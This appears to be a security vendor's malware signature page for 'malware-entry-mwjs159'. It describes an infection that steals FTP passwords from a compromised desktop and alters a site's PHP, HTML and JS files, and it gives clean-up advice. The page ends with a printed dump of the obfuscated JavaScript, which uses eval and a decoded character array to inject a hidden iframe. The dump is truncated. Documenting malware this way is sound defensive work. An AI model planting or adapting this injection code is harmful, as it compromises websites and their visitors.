SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware-entry-mwjs159

malware-entry-mwjs159

Description: This malware infects a web site through a compromised desktop (with virus), where
it steals any stored password from the FTP client and uses that to attack the site.
Note that every PHP, HTML and JS file gets compromised by this malware.

Affecting: Any web site with FTP enabled (and password stolen).

Clean up: The desktop must be cleaned first. Use multiple AVs if necessary, since this
virus is very good at hiding from the current AV that is running. Once it is clean, then you
can clean up the sites and change the passwords.You can also sign up with us and let our team remove the malware for you.

Malware dump:


<script>String&#46prototype&#46test="harC";for(i in $='esrhserh')if(i=='te'+'st')m=$[i];try{new Object()&#46wehweh();}catch(q){ss="";}try{window'e'+'v'+'al'}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d&#46valueOf()-2);Object&#46prototype&#46asd="e";if({}&#46asd==='e')a=document'c'+'r'+'e'+'a'+'t'+'e'+'T'+'e'+'x'+'t'+'N'+'o'+'d'+'e';if(a&#46data==321)t=-1*(d-d2);n=[7-t,7-t,103-t,100-t,30-t,38-t,98-t,109-t,97-t,115-t,107-t,99-t,108-
t,114-t,44-t,101-t,99-t,114-t,67-t,106-t,99-t,107-t,99-t,108-t,114-t,113-t,64-t,119-t,82-t,95-t,101-
t,76-t,95-t,107-t,99-t,38-t,37-t,96-t,109-t,98-t,119-t,37-t,39-t,89-t,46-t,91-t,39-t,121-t,7-t,7-
t,7-t,103-t,100-t,112-t,95-t,107-t,99-t,112-t,38-t,39-t,57-t,7-t,7-t,123-t,30-t,99-t,106-t,113-t,99-t,30-t,121-t,7-t,7-t,7-t,98-t,109-t,97-t,115-t,107-t,99-t,108-t,114-t,44-t,117-t,112-t,103-t,114-t,99-t,38-
t,32-t,58-t,103-t,100-t,112-t,95-t,107-t,99-t,30..
t,99-t,37-t,57-t,100-t,44-t,113-t,114-t,119-t,106-t,99-t,44-t,106-t,99-t,100-t,114-t,59-t,37-t,46-t,37-
t,57-t,100-t,44-t,113-t,114-t,119-t,106-t,99-t,44-t,114-t,109-t,110-t,59-t,37-t,46-t,37-t,57-t,100-
t,44-t,113-t,99-t,114-t,63-t,114-t,114-t,112-t,103-t,96-t,115-t,114-t,99-t,38-t,37-t,117-t,103-
t,98-t,114-t,102-t,37-t,42-t,37-t,47-t,46-t,37-t,39-t,57-t,100-t,44-t,113-t,99-t,114-t,63-t,114-t,114-
t,112-t,103-t,96-t,115-t,114-t,99-t,38-t,37-t,102-t,99-t,103-t,101-t,102-t,114-t,37-t,42-t,37-t,47-
t,46-t,37-t,39-t,57-t,7-t,7-t,7-t,98-t,109-t,97-t,115-t,107-t,99-t,108-t,114-t,44-t,101-t,99-t,114-
t,67-t,106-t,99-t,107-t,99-t,108-t,114-t,113-t,64-t,119-t,82-t,95-t,101-t,76-t,95-t,107-t,99-t,38-
t,37-t,96-t,109-t,98-t,119-t,37-t,39-t,89-t,46-t,91-t,44-t,95-t,110-t,110-t,99-t,108-t,98-t,65-t,102-
t,103-t,106-t,98-t,38-t,100-t,39-t,57-t,7-t,7-t,123-t];
for(i=0;i<n.length;i++)ss+=s (eval("n"+"["+"i]"));eval(ss);</script>